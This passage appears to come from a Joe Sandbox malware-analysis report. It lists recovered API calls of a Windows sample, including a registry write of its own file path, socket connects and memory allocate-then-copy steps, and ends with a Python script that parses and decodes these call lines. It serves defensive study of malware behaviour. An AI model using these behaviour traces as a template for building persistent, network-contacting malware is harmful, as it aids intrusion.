                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strlen$CreateDirectory_access
                                                                    • String ID:
                                                                    • API String ID: 2692904705-0
                                                                    • Opcode ID: eca1c5be5744802d5389ec8559ced261d658f058531e2a1ef4abc33b65649ad2
                                                                    • Instruction ID: 05ceb47985c01e60b2406e648c31dabd0bec007536a162591e58ca472eb4f7b4
                                                                    • Opcode Fuzzy Hash: eca1c5be5744802d5389ec8559ced261d658f058531e2a1ef4abc33b65649ad2
                                                                    • Instruction Fuzzy Hash: AB0126B38002287BEB30A3B5DD45FCB776C8B85754F1006AAE750E2081D6F896C08A99
                                                                    APIs
                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00411563
                                                                    • RegOpenKeyExA.ADVAPI32(80000001,10013EE8,00000000,000F003F,?), ref: 0041157E
                                                                    • RegSetValueExA.ADVAPI32(?,1001321C,00000000,00000001,00000000,00000104), ref: 0041159C
                                                                    • RegCloseKey.ADVAPI32(?), ref: 004115A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileModuleNameOpenValue
                                                                    • String ID:
                                                                    • API String ID: 1392962279-0
                                                                    • Opcode ID: b13d62c0c1ed68cc402453a4b87372e96c22c28e860dc255a138181a29fab07e
                                                                    • Instruction ID: 019c2051241d9139f0c274f4128ff85a6215bdbaab3f752a5bb05957c97b6914
                                                                    • Opcode Fuzzy Hash: b13d62c0c1ed68cc402453a4b87372e96c22c28e860dc255a138181a29fab07e
                                                                    • Instruction Fuzzy Hash: 29F04F36A44228FBEB209755CC49FEA7F78EB58750F1000A1F749B50D4DAB09AC4CAA4
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000), ref: 004120B8
                                                                    • _beginthreadex.MSVCRT ref: 004120D6
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004120E6
                                                                    • CloseHandle.KERNEL32(?), ref: 004120EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateEventHandleObjectSingleWait_beginthreadex
                                                                    • String ID:
                                                                    • API String ID: 92035984-0
                                                                    • Opcode ID: 09712f8e9e0bcee6d11d94bb5f8c246c340870b3993e72e7c9fda73f257e5f06
                                                                    • Instruction ID: 15c26be9302d7139859681cd7532fc677a9d9e28b366fa9b608ad3a6ccdbccd6
                                                                    • Opcode Fuzzy Hash: 09712f8e9e0bcee6d11d94bb5f8c246c340870b3993e72e7c9fda73f257e5f06
                                                                    • Instruction Fuzzy Hash: EFF0A4B290022DBFEF01DFA8CD45CEE7BB9EB09251B004565FD21E2265E7318A209B90
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040B8DC
                                                                    • htons.WS2_32(?), ref: 0040B8F8
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 0040B909
                                                                    • closesocket.WS2_32(00000000), ref: 0040B915
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketconnecthtonssocket
                                                                    • String ID:
                                                                    • API String ID: 3817148366-0
                                                                    • Opcode ID: 4440b186bc353a3734170c02f24b6a53ebb497ef7b64766fcd7d4cdcc19832f9
                                                                    • Instruction ID: de1538b51f61d1579774b4fba2cf0c220df95499e09b5b0cf3fac34718153d44
                                                                    • Opcode Fuzzy Hash: 4440b186bc353a3734170c02f24b6a53ebb497ef7b64766fcd7d4cdcc19832f9
                                                                    • Instruction Fuzzy Hash: DAF05E35910238ABEB106BB88C4ABED7668FF05770F108712FA75A62E0D7749741879A
                                                                    APIs
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 10003890
                                                                    • htons.WS2_32(?), ref: 100038AC
                                                                    • connect.WS2_32(00000000,00000002,00000010), ref: 100038BD
                                                                    • closesocket.WS2_32(00000000), ref: 100038C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketconnecthtonssocket
                                                                    • String ID:
                                                                    • API String ID: 3817148366-0
                                                                    • Opcode ID: 4440b186bc353a3734170c02f24b6a53ebb497ef7b64766fcd7d4cdcc19832f9
                                                                    • Instruction ID: 9e11f317ed79feba2931c02fedfeaecc39e7bf7f38e5d0fda9758dd174c25bd2
                                                                    • Opcode Fuzzy Hash: 4440b186bc353a3734170c02f24b6a53ebb497ef7b64766fcd7d4cdcc19832f9
                                                                    • Instruction Fuzzy Hash: F4F030319103286BE711AB648C49BDD77A8FF047B4F108751F935A61D4E77096408795
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateGuidInitializeUninitialize_snprintf
                                                                    • String ID:
                                                                    • API String ID: 61646808-0
                                                                    • Opcode ID: 8ee7ab5f3f56983602ac466d3f439b31c02af002dc1d8de44b72d6b0248929f0
                                                                    • Instruction ID: 67317e8825d2e5dfda3983625b0fce642b825d1024146347727a65b96114f69b
                                                                    • Opcode Fuzzy Hash: 8ee7ab5f3f56983602ac466d3f439b31c02af002dc1d8de44b72d6b0248929f0
                                                                    • Instruction Fuzzy Hash: D6E0DF30A04328BBEB006BE84C4DF9A7A68FB00686F404410FA15E2195E63092008695
                                                                    APIs
                                                                    • CloseServiceHandle.ADVAPI32(?,00411DF9), ref: 00411E18
                                                                    • CloseServiceHandle.ADVAPI32(?,00411DF9), ref: 00411E2C
                                                                    • RegCloseKey.ADVAPI32(?,00411DF9), ref: 00411E40
                                                                    • Sleep.KERNEL32(000001F4,00411DF9), ref: 00411E4B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$HandleService$Sleep
                                                                    • String ID:
                                                                    • API String ID: 994006413-0
                                                                    • Opcode ID: 4cafcf6a035de77a1114ddb544aa94f652916a08266fde408dd5dffb52dadd78
                                                                    • Instruction ID: 2168d32dfec7fed27758dbb0f6211f74d8a8c88cfebc817e25f46f4c3b036c18
                                                                    • Opcode Fuzzy Hash: 4cafcf6a035de77a1114ddb544aa94f652916a08266fde408dd5dffb52dadd78
                                                                    • Instruction Fuzzy Hash: 6FE0753281036AEBDF226FA0CDC9A9EB7B6BB04346F8440EAF60560174C7754ED4DE04
                                                                    APIs
                                                                    • CloseServiceHandle.ADVAPI32(?,10009DAD), ref: 10009DCC
                                                                    • CloseServiceHandle.ADVAPI32(?,10009DAD), ref: 10009DE0
                                                                    • RegCloseKey.ADVAPI32(?,10009DAD), ref: 10009DF4
                                                                    • Sleep.KERNEL32(000001F4,10009DAD), ref: 10009DFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$HandleService$Sleep
                                                                    • String ID:
                                                                    • API String ID: 994006413-0
                                                                    • Opcode ID: 4cafcf6a035de77a1114ddb544aa94f652916a08266fde408dd5dffb52dadd78
                                                                    • Instruction ID: ba0a33c1daf7f0af3c97f2baaddd9a82aa66f5124a4b6a8d4d3783b28ce7e623
                                                                    • Opcode Fuzzy Hash: 4cafcf6a035de77a1114ddb544aa94f652916a08266fde408dd5dffb52dadd78
                                                                    • Instruction Fuzzy Hash: 42E0753185026ADBEF51AFA0CCD9A9DB7B5FB053C6F8140F9E20660068C7314E94DF00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-
                                                                    • API String ID: 1302938615-2137968064
                                                                    • Opcode ID: b03f53305c6531d4e56e6b4d46cc6c3a3741a97d38f005764214c494d7e0074f
                                                                    • Instruction ID: d06893496b073d2de40113085c47a21f7c30526eda4af56c8fb79f280d749dec
                                                                    • Opcode Fuzzy Hash: b03f53305c6531d4e56e6b4d46cc6c3a3741a97d38f005764214c494d7e0074f
                                                                    • Instruction Fuzzy Hash: 4091AFB8E002199ADBA4DE6DC8806BFBFA1AF44724F74C59FE855A7390D770D9808B14
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0244C000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_244c000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: [
                                                                    • API String ID: 48624451-784033777
                                                                    • Opcode ID: d303d9cbccb44c0c8dde02a755f4b0dc86ad410793161eee0eea7cf7ba406c92
                                                                    • Instruction ID: 6826222127b3e248d6dc4d9d5a55989d2cf0fb309a029920748385dcf4f94efd
                                                                    • Opcode Fuzzy Hash: d303d9cbccb44c0c8dde02a755f4b0dc86ad410793161eee0eea7cf7ba406c92
                                                                    • Instruction Fuzzy Hash: 38215176A01129AB8B50DE79C840AFEBBF9EF15244F58012AEC45D7284EB35E605CBA4
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(?,00800068,00001000,00000004,00000000,?,?,10004EE2,?), ref: 10006BE4
                                                                    • memset.MSVCRT ref: 10006BEF
                                                                    • VirtualAlloc.KERNEL32(?,10004ED2,00001000,00000004,00000000,?,?,10004EE2,?), ref: 10006C05
                                                                    • memcpy.MSVCRT(00000000,10004ED2,10004ED2), ref: 10006C14
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual$memcpymemset
                                                                    • String ID:
                                                                    • API String ID: 2542864682-0
                                                                    • Opcode ID: a2f7f8fa6422af3310233a552f7b29640331760feec5f913bdf73a1763845b24
                                                                    • Instruction ID: a21920bec02cab8d9cdc451f3b89064926b65b0e05a2826f81f214c4d3d1f21a
                                                                    • Opcode Fuzzy Hash: a2f7f8fa6422af3310233a552f7b29640331760feec5f913bdf73a1763845b24
                                                                    • Instruction Fuzzy Hash: 9C2115B1900208AFEB10DF99CC85FA9B7F9EF08345F11846AE945AB251D374AE90CB50
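The two function entries above with recovered API arguments (the CloseServiceHandle / RegCloseKey / Sleep(000001F4) sequence and the VirtualAlloc / memset / VirtualAlloc / memcpy sequence) are the parts of this listing an analyst actually reads by hand: the Sleep constant and the VirtualAlloc allocation-type and protection words have to be decoded to say what the function does. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin output: it parses API lines in the shape printed above, decodes the Win32 constants, and flags the allocate-then-copy pairing. The sample input is constructed from the lines shown on this page. Two assumptions are labelled in the code: the report prints the API's real parameters first (the first four values of a VirtualAlloc line) followed by further stack slots, which the decoder ignores, and a "?" means the sandbox could not recover that value.

```python
"""Parse Joe Sandbox function 'APIs' lines and decode Win32 allocation flags."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample: the API lines of the two report entries above, as printed.
SAMPLE_APIS = """\
CloseServiceHandle.ADVAPI32(?,10009DAD), ref: 10009DCC
CloseServiceHandle.ADVAPI32(?,10009DAD), ref: 10009DE0
RegCloseKey.ADVAPI32(?,10009DAD), ref: 10009DF4
Sleep.KERNEL32(000001F4,10009DAD), ref: 10009DFF
VirtualAlloc.KERNEL32(?,00800068,00001000,00000004,00000000,?,?,10004EE2,?), ref: 10006BE4
memset.MSVCRT ref: 10006BEF
VirtualAlloc.KERNEL32(?,10004ED2,00001000,00000004,00000000,?,?,10004EE2,?), ref: 10006C05
memcpy.MSVCRT(00000000,10004ED2,10004ED2), ref: 10006C14
"""

# api.MODULE(arg,arg,...), ref: ADDR   or   api.MODULE ref: ADDR   (optional bullet prefix)
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants (documented values); only the commonly seen bits are listed.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE",
             0x100000: "MEM_TOP_DOWN", 0x20000000: "MEM_LARGE_PAGES"}
PAGE_PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
                0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
COPY_APIS = {"memcpy", "memmove", "RtlMoveMemory", "RtlCopyMemory", "WriteProcessMemory"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: tuple   # None where the report printed '?' (assumed: value not recovered)
    ref: str      # call-site address as printed


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = tuple(None if a == "?" else int(a, 16) for a in raw.split(",")) if raw else ()
    return ApiCall(m.group("api"), m.group("module"), args, m.group("ref"))


def parse_api_block(text: str) -> list:
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]


def decode_virtualalloc(call: ApiCall) -> dict:
    """VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect).
    Assumption: the first four printed values are the parameters; the rest are
    further stack slots and are ignored."""
    if call.api != "VirtualAlloc" or len(call.args) < 4:
        raise ValueError("not a VirtualAlloc line with four recovered parameters")
    addr, size, alloc_type, protect = call.args[:4]
    flags = [name for bit, name in MEM_FLAGS.items()
             if alloc_type is not None and alloc_type & bit]
    prot = PAGE_PROTECT.get(protect & 0xFF, f"0x{protect:X}") if protect is not None else "?"
    return {"ref": call.ref, "address": addr, "size": size, "alloc_type": flags,
            "protect": prot,
            # the four PAGE_EXECUTE* values occupy bits 0x10..0x80
            "executable": protect is not None and bool(protect & 0xF0)}


def sleep_ms(call: ApiCall) -> int:
    if call.api != "Sleep" or not call.args or call.args[0] is None:
        raise ValueError("not a Sleep line with a recovered dwMilliseconds")
    return call.args[0]


def find_alloc_then_copy(calls) -> list:
    """Pair each VirtualAlloc with the first copy primitive after it in the same
    listing: the allocate-then-copy pattern used to stage a payload in memory."""
    pairs = []
    for i, c in enumerate(calls):
        if c.api != "VirtualAlloc":
            continue
        for later in calls[i + 1:]:
            if later.api in COPY_APIS:
                pairs.append((c.ref, later.ref))
                break
    return pairs


def report(text: str) -> list:
    calls = parse_api_block(text)
    out = []
    for c in calls:
        if c.api == "VirtualAlloc":
            d = decode_virtualalloc(c)
            size = f"0x{d['size']:X}" if d["size"] is not None else "?"
            out.append(f"{c.ref}: VirtualAlloc size={size} "
                       f"{'|'.join(d['alloc_type']) or '?'} {d['protect']}")
        elif c.api == "Sleep":
            out.append(f"{c.ref}: Sleep {sleep_ms(c)} ms")
    for a, b in find_alloc_then_copy(calls):
        out.append(f"allocate-then-copy: VirtualAlloc@{a} -> copy@{b}")
    return out


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_APIS)))
```

On the lines above this decodes Sleep(000001F4) as a 500 ms pause after the service and registry handles are closed, and the first VirtualAlloc at 10006BE4 as an 0x800068-byte MEM_COMMIT region with PAGE_READWRITE protection that is then filled by memcpy at 10006C14. Note the caveat the decoder makes explicit: the protection here is PAGE_READWRITE, not an executable one, so this listing on its own shows payload staging, not execution; a later VirtualProtect or a second mapping would be needed for that, and neither appears in this entry.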